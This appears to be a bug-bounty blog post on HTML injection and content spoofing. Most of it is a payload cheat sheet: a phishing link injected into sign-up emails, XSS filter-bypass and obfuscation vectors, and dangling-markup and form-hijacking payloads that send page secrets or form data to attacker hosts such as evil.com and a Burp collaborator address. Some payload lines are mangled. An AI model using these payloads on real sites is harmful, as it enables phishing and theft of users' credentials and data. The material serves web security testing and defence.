Content Spoofing! Yes HTML Injection

Aswin Govind
5 min readOct 28, 2021

--

Hey everyone this is Aswin Govind. This time it is HTML Injection which is also referred in Content spoofing, also referred to as content injection, or “arbitrary text injection” or virtual defacement, is an attack targeting a user made possible by an injection vulnerability in a web application.

More definition you can refer @OWASP.

blaaaaa

HTML Injection also similar to Xross Site Scripting. When the payload is injected by the user into an input field and executed in client-side by the web browser as part of the HTML code of the web application.

Types of HTML Injection

  • Store HTML Injection
  • Reflected HTML Injection

HTML Injection is no more critical than XSS. The impact is that we can chained with vulnerabilities like CSRF and then the Criticality of the attack increases because of the user-dependency for the attack to succeed decreases.

As usual try to inject <u>testing_htmli</u> to every input field and check weather its rendering on the browser or not.

<input type="text" name="email" value="<u>testing_htmli</u>">

If yes change it to <script>alert(9)</script> got xss.

Le me show one POC:

HTML Injection(Content Spoofing) in Email was found. The steps were as follow:

  1. Open the Create New Account Page of the application, enter your email id and Password.
  2. In the First Name parameter, HTML Injection payload

( <a href=”attacker.com”><h1>Please click here to login to your account<h1></a> ) is inserted

From esecforte.com

3. A new mail is sent to the user, where the payload is successfully executed.

It can lead to phishing attacks.

Proof of Concept(POC) of HTMLI

HackerOne Unintended HTML Inclusion
Difficulty: Medium
Url: hackerone.com
Report Link: https://hackerone.com/reports/112935
Date Reported: January 26, 2016
Bounty Paid: $500

Within Security Content Spoofing
Difficulty: Low
Url: withinsecurity.com/wp-login.php
Report Link: https://hackerone.com/reports/111094
Date Reported: January 16, 2015
Bounty Paid: $250

So find injection points like

http://vulnerable.site/page.html?user=

https://vulnerable.com/search?term=

http://118.89.17.134/htmli_get.php?firstname=&lastname=ESHLkangi&form=submit

When you find (Text node, open tag) try to inject these:

Different Context:-

</element> :

<title>Results for ‘</title><script>☣<script>’</title>

<- -

<- -lorem ipsem →<script>payload_here<script>- ->

]]>

<FOO><![CDATA[]]><script>payload_here</script>]]>

Attribute value

Unquoted

<input type=text name=foo value=a><script>☣<script>><input type=text name=foo value=a/><script>☣<script>>

Single-quoted(U+0027)

<input type=text name=foo value=’’onevent=☣//’>

Double-quoted(U+0022)

<input type=text name=foo value=””onevent=☣//”>

JavaScript variable assignment

Double-quoted(U+0022)

<script> var foo=””;☣;//”;…

Single-quoted(U+0027)

<script>var foo=’’;☣;//’;…

JavaScript Window.location object property
.hash
.href
.pathname
.search

URL

http://web.site/page/<script>☣<script><script>

document.write(“Page not found: “ + window.location);…

#fragment

http://web.site/page#<script>☣<script>

<script>document.write(window.location);…

#jQuery

http://web.site/page#<img/src=%22%22onerror=☣>

<script>$(document).ready(function() {
var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
var w = $(‘a[name=”’ + x + ‘“], [id=”’ + x + ‘“]’);
});

Payload Crafting Techniques to Bypass Filters and Data Validation

Alternate attribute delimiters

Forward slash

<img/src=””onerror=alert(9)>

Dangling quoted string

<a’’ href’’ onclick=alert(9)>foo</a>

<a”” href=””onclick=alert(9)>foo</a>

CRLF instead of space

<img%0d%0asrc=””%0d%0aonerror=alert(9)>

HTML entity encoding

JavaScript scheme(Decimal, hex, unicode hex)

<a href=”java&#115;cript:alert(9)”>foo</a><a href=”java&#x73;cript:alert(9)”>foo</a><a href=”java&#x0073;cript:alert(9)”>foo</a>

JavaScript inline event handlers1[ html4 | html5 ]

Unquoted

<input type=text name=foo value=a%20onchange=alert(9)>

Double-quoted

<input type=”text” name=”foo” value=””onmouseover=alert(9)//”>

Single-quoted

<input type=’text’ name=’foo’ value=’’onclick=alert(9)//’>

HTML5 autofocus

<input type=”text” name=”foo” value=””autofocus/onfocus=alert(9)//”>

Data URI handlers

src & href attributes

<a href=”data:text/html,<script>alert(9)</script>”>foo</a><script src=”data:,alert(9)”></script><script src=”data:application/x-javascript,alert(9)”></script><script src=”data:text/javascript,alert(9)”></script>

Base64 data

<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a><script src=”data:;base64,YWxlcnQoOSk”></script>

Alternate character sets

<a href=”data:text/html;charset=utf-16,
%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e
%00a%00l%00e%00r%00t%00(%009%00)%00
<%00/%00s%00c%00r%00i%00p%00t%00>%00">foo</a>

Alternate markup

SVG

<g onload=”javascript:alert(9)”></g></svg><svg><script xlink:href=data:,alert(9)></script>

http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(9)”>
<rect width=”1000" height=”1000" fill=”white”/></a></svg>

Untidy markup

Missing greater-than sign

<script%0d%0aalert(9)</script><script%20<! — %20 →alert(9)</script>

Recover from syntax error

<a href=””&<img&amp;/onclick=alert(9)>foo</a><script/<a>alert(9)</script><script/<a>alert(9)</script </a>

Uncommon syntax

<a””id=a href=’’onclick=alert(9)>foo</a>Orphan entity<a href=””&amp;/onclick=alert(9)>foo</a>

Vestigal attribute

<script/id=”a”>alert(9)</script>

Anti-regex patterns

Element closed prematurely

<img src=”>”onerror=alert(9)>

Element confusion

<img id=”><”class=”><”src=”>”onerror=alert(9)>

Quote confusion

<img src=”\”a=”>”onerror=alert(9)>

<a id=’ href=””>’href=javascript:alert(9)>foo</a>

foo

<a href= . ‘“\’ onclick=alert(9) ‘“‘>foo</a>

Quote confusion with element

<img src=”\”’<a href=’”>”’onerror=alert(9)>

JavaScript Compositions for Manipulation & Obfuscation

Concatenation

String operators

var a = “foo”+alert(9)//”;

Logical operators

var a = “foo”&&alert(9)//”;

Mathematical operators

var a = “foo”/alert(9)//”;

Function execution

Anonymous

(function(){alert(9)})()

Method lookup

window[“alert”](9)

Strings

String object

String.fromCharCode(0x61,0x62)

Regex object source attribute

alert(/foo bar/.source)window[/alert/.source](9)

http://attacker.com/log.php?HTML=

http://evil.com/log.php?text=

ftp://evil.com?a=

You can also abuse CSS @import (will send all the code until it find a ";")

<style>@import//hackvertor.co.uk? ←- Injected

<b>steal me!</b>;

You could also use <table:

<table background=’//your-collaborator-id.burpcollaborator.net?’

You could also insert a <base tag.

<base target=’ ←- Injected

steal me’<b>test</b>

Stealing forms

http://evil.com/'>

Stealing forms 2

Set a form header:

Stealing forms 3

The button can change the URL where the information of the form is going to be sent with the attribute “formaction”:

https://google.com'>I get consumed!

Stealing clear text secrets 2

Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:

<input type=’hidden’ name=’review_body’ value=”

You can do the same thing injecting a form and an <option> tag. All the data until a closed </option> is found will be sent:

http://google.com>Click Me

Form parameter injection

You can change the path of a form and insert new values so an unexpected action will be performed:

<form action=’/change_settings.php’>

<input type=’hidden’ name=’invite_user’

value=’fredmbogo’> ← Injected lines

<form action=”/change_settings.php”> ← Existing form (ignored by the parser)

<input type=”text” name=”invite_user” value=””> ← Subverted field

<input type=”hidden” name=”xsrf_token” value=”12345">

</form>

Stealing clear text secrets via noscript

<form action=<a href="http://evil.com">http://evil.com</a>><input type=submitstyle=”position:absolute;left:0;top:0;width:100%;height:100%;” type=submit value=””><textarea name=contents>

Bypassing CSP with user interaction

http://attacker.net/payload.html>You must click me

@import as a scriptless vector

<style>@import//hackvertor.co.uk?<b>steal me!</b>;

Noscript scriptless vector

<form action=<a href="http://google.com">http://google.com</a>><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents>

Using window.name via base target

<base target=’
steal me’<b>test</b>

Button as a scriptless vector

<button name=xss type=submit formaction=//evil>I get consumed!

Option as a scriptless vector

<form action=//evil><select name=xss><option><b>steal me!</b>

At the same time, I hope to have demonstrated that web applications protected by frameworks such as CSP are still likely to suffer significant security consequences in case of a markup injection flaw. I believe that in many real-world scenarios, the qualitative difference offered by the aforementioned mechanisms is substantially less than expected.

Thank You For Reading!

Happy Hunting!

Reference Payloads:

https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/dangling_markup.txt

https://raw.githubusercontent.com/cure53/HTTPLeaks/main/leak.html

Notes:

https://lcamtuf.coredump.cx/postxss/

Owasp testing

--

--